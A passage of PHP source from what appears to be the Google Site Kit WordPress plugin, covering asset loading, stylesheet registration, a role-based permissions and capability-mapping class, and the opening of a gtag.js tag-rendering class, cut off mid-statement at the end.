Get the setup data from the options table. * * @since 1.0.0 * * @param array $data Authentication Data. */ 'setup' => apply_filters( 'googlesitekit_setup_data', array() ), ); } /** * Gets inline modules data. * * @since 1.96.0 * * @return array The inline modules data to be output. */ private function get_inline_modules_data() { /** * Filters the inline modules data to pass to JS. * * @since 1.96.0 * * @param array $data Modules data. */ return apply_filters( 'googlesitekit_inline_modules_data', array() ); } /** * Adds support for async and defer attributes to enqueued scripts. * * @since 1.0.0 * * @param string $tag The script tag. * @param string $handle The script handle. * @return string Modified script tag. */ private function add_async_defer_attribute( $tag, $handle ) { $script_execution = wp_scripts()->get_data( $handle, 'script_execution' ); if ( ! $script_execution ) { return $tag; } if ( 'async' !== $script_execution && 'defer' !== $script_execution ) { return $tag; } // Abort adding async/defer for scripts that have this script as a dependency, unless it is an alias. foreach ( wp_scripts()->registered as $script ) { if ( $script->src && in_array( $handle, $script->deps, true ) ) { return $tag; } } // Add the attribute if it hasn't already been added. if ( ! preg_match( ":\s$script_execution(=|>|\s):", $tag ) ) { $tag = preg_replace( ':(?=></script>):', " $script_execution", $tag, 1 ); } return $tag; } /** * Executes all extra callbacks before printing a list of dependencies. * * This method ensures that such callbacks that run e.g. `wp_add_inline_script()` are executed just-in-time, * only when the asset is actually loaded in the current request. * * This method works recursively, also looking at dependencies, and supports both scripts and stylesheets. * * @since 1.2.0 * * @param WP_Dependencies $dependencies WordPress dependencies class instance. * @param array $handles List of handles to run before print callbacks for. */ private function run_before_print_callbacks( WP_Dependencies $dependencies, array $handles ) { $is_amp = $this->context->is_amp(); foreach ( $handles as $handle ) { if ( isset( $this->print_callbacks_done[ $handle ] ) ) { continue; } $this->print_callbacks_done[ $handle ] = true; if ( isset( $this->assets[ $handle ] ) ) { $this->assets[ $handle ]->before_print(); // TODO: This can be removed at some point, see https://github.com/ampproject/amp-wp/pull/4001. if ( $is_amp && $this->assets[ $handle ] instanceof Script ) { $this->add_extra_script_amp_dev_mode( $handle ); } } if ( isset( $dependencies->registered[ $handle ] ) && is_array( $dependencies->registered[ $handle ]->deps ) ) { $this->run_before_print_callbacks( $dependencies, $dependencies->registered[ $handle ]->deps ); } } } /** * Adds a comment to all extra scripts so that they are considered compatible with AMP dev mode. * * {@see Assets::add_amp_dev_mode_attributes()} makes all registered scripts and stylesheets compatible, including * their potential inline additions. This method does the same for extra scripts, which are registered under the * 'data' key. * * @since 1.4.0 * * @param string $handle The handle of a registered script. */ private function add_extra_script_amp_dev_mode( $handle ) { $data = wp_scripts()->get_data( $handle, 'data' ) ?: ''; if ( ! empty( $data ) && is_string( $data ) ) { wp_scripts()->add_data( $handle, 'data', '/*googlesitekit*/ ' . $data ); } } /** * Gets the prefix for the client side cache key. * * Cache key is scoped to user session and blog_id to isolate the * cache between users and sites (in multisite). * * @since 1.92.0 * * @return string */ private function get_storage_prefix() { $current_user = wp_get_current_user(); $auth_cookie = wp_parse_auth_cookie(); $blog_id = get_current_blog_id(); $session_token = isset( $auth_cookie['token'] ) ? $auth_cookie['token'] : ''; return wp_hash( $current_user->user_login . '|' . $session_token . '|' . $blog_id ); } /** * Gets the product post type. * * @since 1.116.0 * * @return string|null The product post type name or null if not present on the website. */ protected function get_product_post_type() { /** * Filters the product post type. * * @since 1.116.0 * * @param string $product_post_type The product post type name. */ $product_post_type = apply_filters( 'googlesitekit_product_post_type', 'product' ); $product_type = get_post_type_object( $product_post_type ); if ( $product_type instanceof WP_Post_Type && $product_type->public ) { return $product_post_type; } return null; } } <?php /** * Class Google\Site_Kit\Core\Assets\Stylesheet * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Assets; use Google\Site_Kit\Context; /** * Class representing a single stylesheet. * * @since 1.0.0 * @access private * @ignore */ final class Stylesheet extends Asset { /** * Constructor. * * @since 1.0.0 * * @param string $handle Unique stylesheet handle. * @param array $args { * Associative array of stylesheet arguments. * * @type string $src Required stylesheet source URL. * @type array $dependencies List of stylesheet dependencies. Default empty array. * @type string $version Stylesheet version. Default is the version of Site Kit. * @type bool $fallback Whether to only register as a fallback. Default false. * @type callable $before_print Optional callback to execute before printing. Default none. * @type string $media Media for which the stylesheet is defined. Default 'all'. * } */ public function __construct( $handle, array $args ) { parent::__construct( $handle, $args ); $this->args = wp_parse_args( $this->args, array( 'media' => 'all', ) ); } /** * Registers the stylesheet. * * @since 1.0.0 * @since 1.15.0 Adds $context parameter. * * @param Context $context Plugin context. */ public function register( Context $context ) { if ( $this->args['fallback'] && wp_style_is( $this->handle, 'registered' ) ) { return; } $src = $this->args['src']; $version = $this->args['version']; list( $filename, $hash ) = Manifest::get( $this->handle ); if ( $filename ) { $src = $context->url( 'dist/assets/css/' . $filename ); $version = $hash; } wp_register_style( $this->handle, $src, (array) $this->args['dependencies'], $version, $this->args['media'] ); } /** * Enqueues the stylesheet. * * @since 1.0.0 */ public function enqueue() { wp_enqueue_style( $this->handle ); } } <?php /** * Class Google\Site_Kit\Core\Permissions\Permissions * * @package Google\Site_Kit\Core\Permissions * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Permissions; use Exception; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Dismissals\Dismissed_Items; use Google\Site_Kit\Core\Modules\Module_With_Owner; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Storage\User_Options; use WP_REST_Response; use WP_REST_Server; use WP_User; /** * Class managing plugin permissions. * * @since 1.0.0 * @access private * @ignore */ final class Permissions { /* * Custom base capabilities. */ const AUTHENTICATE = 'googlesitekit_authenticate'; const SETUP = 'googlesitekit_setup'; const VIEW_POSTS_INSIGHTS = 'googlesitekit_view_posts_insights'; const VIEW_DASHBOARD = 'googlesitekit_view_dashboard'; const VIEW_WP_DASHBOARD_WIDGET = 'googlesitekit_view_wp_dashboard_widget'; const VIEW_ADMIN_BAR_MENU = 'googlesitekit_view_admin_bar_menu'; const MANAGE_OPTIONS = 'googlesitekit_manage_options'; const UPDATE_PLUGINS = 'googlesitekit_update_plugins'; /* * Custom meta capabilities. */ const VIEW_SPLASH = 'googlesitekit_view_splash'; const VIEW_SHARED_DASHBOARD = 'googlesitekit_view_shared_dashboard'; const VIEW_AUTHENTICATED_DASHBOARD = 'googlesitekit_view_authenticated_dashboard'; const VIEW_POST_INSIGHTS = 'googlesitekit_view_post_insights'; const READ_SHARED_MODULE_DATA = 'googlesitekit_read_shared_module_data'; const MANAGE_MODULE_SHARING_OPTIONS = 'googlesitekit_manage_module_sharing_options'; const DELEGATE_MODULE_SHARING_MANAGEMENT = 'googlesitekit_delegate_module_sharing_management'; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Authentication instance. * * @since 1.0.0 * @var Authentication */ protected $authentication; /** * Modules instance. * * @since 1.69.0 * @var Modules */ private $modules; /** * User_Options instance. * * @since 1.69.0 * @var User_Options */ private $user_options; /** * Dismissed_Items instance. * * @since 1.69.0 * @var Dismissed_Items */ private $dismissed_items; /** * Mappings for custom base capabilities to WordPress core built-in ones. * * @since 1.30.0 * @var array */ private $base_to_core = array(); /** * Mappings for custom meta capabilities to WordPress core built-in ones. * * @since 1.0.0 * @var array */ private $meta_to_core = array(); /** * Mappings for custom meta capabilities to custom base capabilities. * * @since 1.30.0 * @var array */ private $meta_to_base = array(); /** * List of custom base capabilities that should require network access if the plugin is in network mode. * * @since 1.30.0 * @var array */ private $network_base = array(); /** * Constructor. * * Sets up the capability mappings. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Authentication $authentication Authentication instance. * @param Modules $modules Modules instance. * @param User_Options $user_options User_Options instance. * @param Dismissed_Items $dismissed_items Dismissed_Items instance. */ public function __construct( Context $context, Authentication $authentication, Modules $modules, User_Options $user_options, Dismissed_Items $dismissed_items ) { $this->context = $context; $this->authentication = $authentication; $this->modules = $modules; $this->user_options = $user_options; $this->dismissed_items = $dismissed_items; $this->base_to_core = array( // By default, only allow administrators to authenticate. self::AUTHENTICATE => 'manage_options', // Allow contributors and up to view their own post's insights. self::VIEW_POSTS_INSIGHTS => 'edit_posts', // Allow editors and up to view the dashboard and module details. self::VIEW_DASHBOARD => 'edit_posts', self::VIEW_WP_DASHBOARD_WIDGET => 'edit_posts', self::VIEW_ADMIN_BAR_MENU => 'edit_posts', // Allow administrators and up to manage options and set up the plugin. self::MANAGE_OPTIONS => 'manage_options', self::SETUP => 'manage_options', self::UPDATE_PLUGINS => 'update_plugins', ); $this->meta_to_core = array( // Allow users that can edit a post to view that post's insights. self::VIEW_POST_INSIGHTS => 'edit_post', ); $this->meta_to_base = array( self::VIEW_SPLASH => self::VIEW_DASHBOARD, self::VIEW_AUTHENTICATED_DASHBOARD => array( self::VIEW_DASHBOARD, self::AUTHENTICATE ), // Allow users that can generally view posts insights to view a specific post's insights. self::VIEW_POST_INSIGHTS => self::VIEW_POSTS_INSIGHTS, // Allow users that can generally view dashboard to read shared module data. self::READ_SHARED_MODULE_DATA => self::VIEW_DASHBOARD, // Admins who can manage options for SK can generally manage module sharing options. self::MANAGE_MODULE_SHARING_OPTIONS => self::MANAGE_OPTIONS, self::DELEGATE_MODULE_SHARING_MANAGEMENT => self::MANAGE_OPTIONS, self::VIEW_SHARED_DASHBOARD => self::VIEW_DASHBOARD, ); $this->network_base = array( // Require network admin access to view the dashboard and module details in network mode. self::VIEW_DASHBOARD => 'manage_network', self::VIEW_WP_DASHBOARD_WIDGET => 'manage_network', self::VIEW_ADMIN_BAR_MENU => 'manage_network', // Require network admin access to manage options and set up the plugin in network mode. self::MANAGE_OPTIONS => 'manage_network_options', self::SETUP => 'manage_network_options', ); } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { add_filter( 'map_meta_cap', function ( array $caps, $cap, $user_id, $args ) { return $this->map_meta_capabilities( $caps, $cap, $user_id, $args ); }, 10, 4 ); add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/permissions', ) ); } ); // This constant can be set if an alternative mechanism to grant these capabilities is in place. if ( defined( 'GOOGLESITEKIT_DISABLE_DYNAMIC_CAPABILITIES' ) && GOOGLESITEKIT_DISABLE_DYNAMIC_CAPABILITIES ) { return; } add_filter( 'user_has_cap', function ( array $allcaps ) { return $this->grant_additional_caps( $allcaps ); } ); } /** * Get dashboard sharing meta permissions for current user. * * @since 1.70.0 * * @return array List meta capabilities as keys and current user permission as value. */ public function get_dashboard_sharing_meta_permissions() { $dashboard_sharing_meta_capabilities = self::get_dashboard_sharing_meta_capabilities(); $shareable_modules = array_keys( $this->modules->get_shareable_modules() ); $dashboard_sharing_meta_permissions = array(); foreach ( $dashboard_sharing_meta_capabilities as $cap ) { foreach ( $shareable_modules as $module ) { $dashboard_sharing_meta_permissions[ "{$cap}::" . wp_json_encode( array( $module ) ) ] = current_user_can( $cap, $module ); } } return $dashboard_sharing_meta_permissions; } /** * Check permissions for current user. * * @since 1.21.0 * * @return array List of base capabilities and meta capabilities as keys and current user permission as value. */ public function check_all_for_current_user() { $permissions = self::get_capabilities(); return array_merge( array_combine( $permissions, array_map( 'current_user_can', $permissions ) ), self::get_dashboard_sharing_meta_permissions() ); } /** * Resolves meta capabilities to their base capabilities. * * This method first maps plugin meta capabilities to their base capabilities. In addition, if the meta * capability should also map to a core meta capability, that mapping is taken care of as well. * * If in network mode and the custom base capability requires network access, it is checked that the user * has that access, and if not, the method bails early causing in a result of false. * * It also prevents access to Site Kit's custom capabilities based on additional rules. These additional * checks ideally could be done within the `user_has_cap` filter. However, the `user_has_cap` filter is * applied after a check for multi-site admins which could potentially grant the capability without * executing these additional checks. * * @see WP_User::has_cap() To see the order of execution mentioned above. * * @since 1.0.0 * * @param array $caps List of resolved capabilities. * @param string $cap Capability checked. * @param int $user_id Current user ID. * @param array $args Additional arguments passed to the capability check. * @return array Filtered value of $caps. */ private function map_meta_capabilities( array $caps, $cap, $user_id, $args ) { // Bail early under these circumstances as we already know for sure the check will result in false. if ( isset( $this->network_base[ $cap ] ) && $this->context->is_network_mode() && ! is_super_admin( $user_id ) ) { return array( 'do_not_allow' ); } if ( isset( $this->meta_to_base[ $cap ] ) ) { $caps = (array) $this->meta_to_base[ $cap ]; } if ( isset( $this->meta_to_core[ $cap ] ) ) { $required_core_caps = call_user_func_array( 'map_meta_cap', array_merge( array( $this->meta_to_core[ $cap ], $user_id ), $args ) ); $caps = array_merge( $caps, $required_core_caps ); } // Special setup and authentication rules. if ( ( isset( $this->base_to_core[ $cap ] ) || isset( $this->meta_to_core[ $cap ] ) ) ) { // If setup has not yet been completed, require administrator capabilities for everything. if ( self::SETUP !== $cap && ! $this->authentication->is_setup_completed() ) { $caps[] = self::SETUP; } if ( ! in_array( $cap, array( self::AUTHENTICATE, self::SETUP, self::VIEW_DASHBOARD, self::VIEW_POSTS_INSIGHTS, self::VIEW_WP_DASHBOARD_WIDGET, self::VIEW_ADMIN_BAR_MENU ), true ) ) { // For regular users, require being authenticated. if ( ! $this->is_user_authenticated( $user_id ) ) { return array_merge( $caps, array( 'do_not_allow' ) ); } // For admin users, also require being verified. if ( user_can( $user_id, self::SETUP ) && ! $this->is_user_verified( $user_id ) ) { return array_merge( $caps, array( 'do_not_allow' ) ); } // For all users, require setup to have been completed. if ( ! $this->authentication->is_setup_completed() ) { return array_merge( $caps, array( 'do_not_allow' ) ); } } } if ( in_array( $cap, self::get_dashboard_sharing_capabilities(), true ) ) { $caps = array_merge( $caps, $this->check_dashboard_sharing_capability( $cap, $user_id, $args ) ); } switch ( $cap ) { case self::VIEW_SPLASH: $caps = array_merge( $caps, $this->check_view_splash_capability( $user_id ) ); break; // Intentional fallthrough - viewing the dashboard widget and admin bar menu require // a user to be authenticated. case self::VIEW_AUTHENTICATED_DASHBOARD: $caps = array_merge( $caps, $this->check_view_authenticated_dashboard_capability( $user_id ) ); break; // Intentional fallthrough. case self::VIEW_DASHBOARD: case self::VIEW_POSTS_INSIGHTS: $caps = array_merge( $caps, $this->check_view_dashboard_capability( $user_id ) ); break; case self::VIEW_WP_DASHBOARD_WIDGET: case self::VIEW_ADMIN_BAR_MENU: $caps = array_merge( $caps, $this->check_view_wp_dashboard_widget_and_admin_bar_capability( $user_id ) ); break; } return $caps; } /** * Checks a dashboard sharing capability based on rules of dashboard sharing. * * @since 1.69.0 * * @param string $cap Capability to be checked. * @param int $user_id User ID of the user the capability is checked for. * @param array $args Additional arguments passed to check a meta capability. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_dashboard_sharing_capability( $cap, $user_id, $args ) { if ( isset( $args[0] ) ) { $module_slug = $args[0]; } switch ( $cap ) { case self::VIEW_SHARED_DASHBOARD: return $this->check_view_shared_dashboard_capability( $user_id ); case self::READ_SHARED_MODULE_DATA: return $this->check_read_shared_module_data_capability( $user_id, $module_slug ); case self::MANAGE_MODULE_SHARING_OPTIONS: case self::DELEGATE_MODULE_SHARING_MANAGEMENT: return $this->check_module_sharing_admin_capability( $cap, $user_id, $module_slug ); default: return array(); } } /** * Checks if the VIEW_SPLASH capability is allowed for the user. * * @since 1.73.0 * * @param int $user_id User ID of the user the capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_view_splash_capability( $user_id ) { if ( $this->is_shared_dashboard_splash_dismissed( $user_id ) ) { return array( self::AUTHENTICATE ); } if ( ! $this->user_has_shared_role( $user_id ) ) { return array( self::AUTHENTICATE ); } return array(); } /** * Checks if the VIEW_DASHBOARD capability is allowed for the user. * * Allows access to the VIEW_DASHBOARD capability if the user can view either * the authenticated or shared dashboard. * * @since 1.73.0 * * @param int $user_id User ID of the user the capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_view_dashboard_capability( $user_id ) { $view_authenticated_dashboard = $this->check_view_authenticated_dashboard_capability( $user_id ); if ( in_array( 'do_not_allow', $view_authenticated_dashboard, true ) ) { return $this->check_view_shared_dashboard_capability( $user_id ); } return $view_authenticated_dashboard; } /** * Checks if the VIEW_WP_DASHBOARD_WIDGET and VIEW_ADMIN_BAR_MENU capabilities are allowed for the user. * * Allows access to the VIEW_WP_DASHBOARD_WIDGET and VIEW_ADMIN_BAR_MENU capabilities if the user can view * either the authenticated or shared dashboard and if the user has a shared role for either the Analytics * or Search Console module. * * @since 1.120.0 * * @param int $user_id User ID of the user the capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_view_wp_dashboard_widget_and_admin_bar_capability( $user_id ) { $view_dashboard_capability = $this->check_view_dashboard_capability( $user_id ); if ( in_array( self::AUTHENTICATE, $view_dashboard_capability, true ) || in_array( 'do_not_allow', $view_dashboard_capability, true ) ) { return $view_dashboard_capability; } if ( ! $this->user_has_shared_role_for_module( $user_id, 'analytics-4' ) && ! $this->user_has_shared_role_for_module( $user_id, 'search-console' ) ) { return array( 'do_not_allow' ); } return array(); } /** * Checks if the VIEW_SHARED_DASHBOARD capability should be denied. * * Prevents access to the VIEW_SHARED_DASHBOARD capability if a user does not * have any of the shared roles set for any shareable module or if they have * not dismissed the dashboard sharing splash screen message. * * @since 1.69.0 * * @param int $user_id User ID of the user the capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_view_shared_dashboard_capability( $user_id ) { if ( ! $this->user_has_shared_role( $user_id ) ) { return array( 'do_not_allow' ); } if ( ! $this->is_shared_dashboard_splash_dismissed( $user_id ) ) { return array( 'do_not_allow' ); } return array(); } /** * Checks if the VIEW_AUTHENTICATED_DASHBOARD capability is allowed for the user. * * Allows access to the VIEW_AUTHENTICATED_DASHBOARD capability if the user is authenticated. * * @since 1.73.0 * * @param int $user_id User ID of the user the capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, otherise returns AUTHENTICATE capability. */ private function check_view_authenticated_dashboard_capability( $user_id ) { if ( $this->is_user_authenticated( $user_id ) && $this->is_user_verified( $user_id ) && $this->authentication->is_setup_completed() ) { return array( self::AUTHENTICATE ); } return array( 'do_not_allow' ); } /** * Checks if the READ_SHARED_MODULE_DATA capability should be denied. * * Prevents access to the READ_SHARED_MODULE_DATA capability if a user does not * have the shared roles set for the given module slug. * * @since 1.69.0 * * @param int $user_id User ID of the user the capability is checked for. * @param string $module_slug Module for which the meta capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_read_shared_module_data_capability( $user_id, $module_slug ) { if ( ! $this->user_has_shared_role_for_module( $user_id, $module_slug ) ) { return array( 'do_not_allow' ); } return array(); } /** * Checks if the MANAGE_MODULE_SHARING_OPTIONS or the DELEGATE_MODULE_SHARING_MANAGEMENT * capability should be denied. * * Prevents access to MANAGE_MODULE_SHARING_OPTIONS or the DELEGATE_MODULE_SHARING_MANAGEMENT * capability if a user is not an authenticated admin. * * Furthermore, it prevents access for these capabilities if the user is not the owner * of the given module slug. This check is skipped for MANAGE_MODULE_SHARING_OPTIONS if the * module settings allow all admins to manage sharing options for that module. * * @since 1.69.0 * * @param string $cap Capability to be checked. * @param int $user_id User ID of the user the capability is checked for. * @param string $module_slug Module for which the meta capability is checked for. * @return array Array with a 'do_not_allow' element if checks fail, empty array if checks pass. */ private function check_module_sharing_admin_capability( $cap, $user_id, $module_slug ) { $module_sharing_settings = $this->modules->get_module_sharing_settings(); $sharing_settings = $module_sharing_settings->get(); if ( ! $this->is_user_authenticated( $user_id ) ) { return array( 'do_not_allow' ); } if ( self::MANAGE_MODULE_SHARING_OPTIONS === $cap && isset( $sharing_settings[ $module_slug ]['management'] ) && 'all_admins' === $sharing_settings[ $module_slug ]['management'] ) { return array(); } try { $module = $this->modules->get_module( $module_slug ); if ( ! ( $module instanceof Module_With_Owner ) ) { return array( 'do_not_allow' ); } if ( $module->get_owner_id() !== $user_id ) { return array( 'do_not_allow' ); } } catch ( Exception $e ) { return array( 'do_not_allow' ); } return array(); } /** * Checks if the given user has a role in the list of shared roles. * * @since 1.73.0 * * @param int $user_id User ID. * @param string[]|null $shared_roles Optional. List of shared role IDs to check against the user's. Defaults to all shared module roles. * @return bool */ private function user_has_shared_role( $user_id, ?array $shared_roles = null ) { if ( ! is_array( $shared_roles ) ) { $shared_roles = $this->modules->get_module_sharing_settings()->get_all_shared_roles(); } $shared_user_roles = array_intersect( $shared_roles, ( new WP_User( $user_id ) )->roles ); return ! empty( $shared_user_roles ); } /** * Checks if the given user has a role in the list of shared roles for the given module. * * @since 1.73.0 * * @param int $user_id User ID. * @param string $module Module slug. * @return bool */ private function user_has_shared_role_for_module( $user_id, $module ) { $settings = $this->modules->get_module_sharing_settings()->get(); if ( empty( $settings[ $module ]['sharedRoles'] ) ) { return false; } return $this->user_has_shared_role( $user_id, $settings[ $module ]['sharedRoles'] ); } /** * Checks if a user is authenticated in Site Kit. * * @since 1.69.0 * * @param int $user_id User ID of the user to be checked. * @return bool True if the user is authenticated, false if not. */ public function is_user_authenticated( $user_id ) { $restore_user = $this->user_options->switch_user( $user_id ); $is_user_authenticated = $this->authentication->is_authenticated(); $restore_user(); return $is_user_authenticated; } /** * Checks if a user is verified in Site Kit. * * @since 1.69.0 * * @param int $user_id User ID of the user to be checked. * @return bool True if the user is verified, false if not. */ public function is_user_verified( $user_id ) { $restore_user = $this->user_options->switch_user( $user_id ); $is_user_verified = $this->authentication->verification()->has(); $restore_user(); return $is_user_verified; } /** * Checks if a user has dimissed the shared dashboard splash screen message. * * @since 1.69.0 * * @param int $user_id User ID of the user to be checked. * @return bool True if the user has dismissed the splash message, false if not. */ private function is_shared_dashboard_splash_dismissed( $user_id ) { $restore_user = $this->user_options->switch_user( $user_id ); $is_splash_dismissed = $this->dismissed_items->is_dismissed( 'shared_dashboard_splash' ); $restore_user(); return $is_splash_dismissed; } /** * Grants custom capabilities on-the-fly, based on core capabilities. * * If you want to instead set up your own custom role or mechanism to grant these capabilities, you can set a * constant flag `GOOGLESITEKIT_DISABLE_DYNAMIC_CAPABILITIES` to ensure this function is not hooked in. * * @since 1.0.0 * * @param array $allcaps Associative array of $capability => $grant pairs. * @return array Filtered value of $allcaps. */ private function grant_additional_caps( array $allcaps ) { foreach ( $this->base_to_core as $custom_cap => $core_cap ) { if ( isset( $allcaps[ $core_cap ] ) ) { $allcaps[ $custom_cap ] = $allcaps[ $core_cap ]; } } return $allcaps; } /** * Gets related REST routes. * * @since 1.82.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { return array( new REST_Route( 'core/user/data/permissions', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->check_all_for_current_user() ); }, 'permission_callback' => function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }, ), ) ), ); } /** * Gets all the base capabilities used in Google Site Kit. * * @since 1.31.0 * * @return array */ public static function get_capabilities() { return array( self::AUTHENTICATE, self::SETUP, self::VIEW_POSTS_INSIGHTS, self::VIEW_DASHBOARD, self::MANAGE_OPTIONS, self::UPDATE_PLUGINS, self::VIEW_SPLASH, self::VIEW_AUTHENTICATED_DASHBOARD, self::VIEW_WP_DASHBOARD_WIDGET, self::VIEW_ADMIN_BAR_MENU, self::VIEW_SHARED_DASHBOARD, ); } /** * Gets all the capabilities specifically added for dashboard sharing. * * @since 1.69.0 * * @return array List of capabilities specific to dashboard sharing. */ public static function get_dashboard_sharing_capabilities() { return array( self::VIEW_SHARED_DASHBOARD, self::READ_SHARED_MODULE_DATA, self::MANAGE_MODULE_SHARING_OPTIONS, self::DELEGATE_MODULE_SHARING_MANAGEMENT, ); } /** * Gets all the meta capabilities specifically added for dashboard sharing. * * @since 1.70.0 * * @return array List of meta capabilities specific to dashboard sharing. */ public static function get_dashboard_sharing_meta_capabilities() { return array( self::READ_SHARED_MODULE_DATA, self::MANAGE_MODULE_SHARING_OPTIONS, self::DELEGATE_MODULE_SHARING_MANAGEMENT, ); } } <?php /** * Interface Google\Site_Kit\Core\Tags\Blockable_Tag_Interface * * @package Google\Site_Kit\Core\Tags * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Interface for a blockable tag. * * @since 1.24.0 * @access private * @ignore */ interface Blockable_Tag_Interface { /** * Checks whether or not the tag should be blocked from rendering. * * @since 1.24.0 * * @return bool TRUE if the tag should be blocked, otherwise FALSE. */ public function is_tag_blocked(); /** * Gets the HTML attributes for a script tag that may potentially require user consent before loading. * * @since 1.24.0 * * @return string HTML attributes to add if the tag requires consent to load, or an empty string. */ public function get_tag_blocked_on_consent_attribute(); } <?php /** * Class Google\Site_Kit\Core\Tags\GTag * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway_Settings; use Google\Site_Kit\Core\Util\BC_Functions; use Google\Site_Kit\Core\Util\Feature_Flags; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class to handle gtag rendering across modules. * * @since 1.124.0 * @access public * @ignore */ class GTag { use Method_Proxy_Trait; const HANDLE = 'google_gtagjs'; /** * Options instance. * * @var Options */ private $options; /** * Holds an array of gtag ID's and their inline config elements. * * @var array $tags Array of tag ID's and their configs. */ private $tags = array(); /** * Holds an array of gtag commands, their parameters and command positions. * * @var array $commands Array of gtag config commands. */ private $commands = array(); /** * Constructor. * * @since 1.142.0 * * @param Options $options Option API instance. */ public function __construct( Options $options ) { $this->options = $options; } /** * Register method called after class instantiation. * * @since 1.124.0 */ public function register() { add_action( 'wp_enqueue_scripts', fn() => $this->enqueue_gtag_script(), 20 ); // The wp_enqueue_scripts action is hooked on wp_head @ 1; // The hat script needs to be hooked in after for tag state to be available. // This also avoids printing from within the "enqueue" action. add_action( 'wp_head', fn() => $this->maybe_print_hat_script(), 2 ); add_filter( 'wp_resource_hints', function ( $urls, $relation_type ) { if ( 'dns-prefetch' === $relation_type ) { $urls[] = '//www.googletagmanager.com'; } return $urls; }, 10, 2 ); } /** * Prints the first party tag hat script if GTG is enabled. */ private function maybe_print_hat_script() { if ( ! $this->is_google_tag_gateway_active() ) { return; } $tag_ids = wp_list_pluck( $this->tags, 'tag_id' ); if ( ! $tag_ids ) { return; } $js = <<<'JS' (function(w,i,g){w[g]=w[g]||[];if(typeof w[g].push=='function')w[g].push.apply(w[g],i)}) (window,%s,'google_tags_first_party'); JS; printf( "\n<!-- %s -->\n", esc_html__( 'Google tag gateway for advertisers snippet added by Site Kit', 'google-site-kit' ) ); BC_Functions::wp_print_inline_script_tag( sprintf( $js, wp_json_encode( $tag_ids ) ) ); } /** * Method to add a gtag ID and config for output rendering. * * @since 1.124.0 * @access public * * @param string $tag_id The gtag ID. * @param array $config Array of inline gtag config values. * * @return void */ public function add_tag( $tag_id, $config = array() ) { $this->tags[] = array( 'tag_id' => $tag_id, 'config' => $config, ); } /** * Method to add a gtag command, associated parameters and output position. * * @since 1.124.0 * @access public * * @param string $command The gtag command to add. * @param array $parameters Array of command parameters. * @param string $position Position of command. "before|after". * * @return void */ public function add_command( $command, $parameters, $position = 'after' ) { $this->commands[] = array( 'command' => $command, // e.g. 'config', 'event', etc. 'parameters' => $parameters, // e.g. array( 'send_to', 'AW-123456789' ). 'position' => $position, // e.g. 'after', 'before'. This determines the position of the inline script relative to the gtag.js script. ); } /** * Method used to enqueue the gtag script along with additional tags, * configs and commands. * * @since 1.124.0 * @access protected * * @return void */ protected function enqueue_gtag_script() { // $this->tags and $this->commands will be populated via this action's handlers. do_action( 'googlesitekit_setup_gtag', $this ); if ( empty( $this->tags ) ) { return; } $gtag_src = $this->get_gtag_src(); $gtag_deps = $this->get_gtag_deps(); wp_register_script( self::HANDLE, $gtag_src, $gtag_deps, null, false ); // phpcs:ignore WordPress.WP.EnqueuedResourceParameters.MissingVersion wp_script_add_data( self::HANDLE, 'script_execution', 'async' ); wp_enqueue_script( self::HANDLE ); // Note that `gtag()` may already be defined via the `Consent_Mode` output, but this is safe to call multiple times. wp_add_inline_script( self::HANDLE, 'window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}' ); foreach ( $this->commands as $command ) { wp_add_inline_script( self::HANDLE, $this->get_gtag_call_for_command( $command ), $command['position'] ); } wp_add_inline_script( self::HANDLE, 'gtag("js", new Date());' ); wp_add_inline_script( self::HANDLE, 'gtag("set", "developer_id.dZTNiMT", true);' ); // Site Kit developer ID. if ( $this->is_google_tag_gateway_active() ) { wp_add_inline_script( self::HANDLE, 'gtag("set", "developer_id.dZmZmYj", true);' ); } foreach ( $this->tags as $tag ) { wp_add_inline_script( self::HANDLE, $this->get_gtag_call_for_tag( $tag ) ); } $first_handle = $gtag_deps[0] ?? self::HANDLE; $filter_google_gtagjs = function ( $tag, $handle ) use ( $first_handle ) { if ( $first_handle !== $handle ) { return $tag; } $snippet_comment_begin = sprintf( "\n<!-- %s -->\n", esc_html__( 'Google tag (gtag.js) snippet added by Site Kit', 'google-site-kit' ) ); return $snippet_comment_begin . $tag; }; add_filter( 'script_loader_tag', $filter_google_gtagjs, 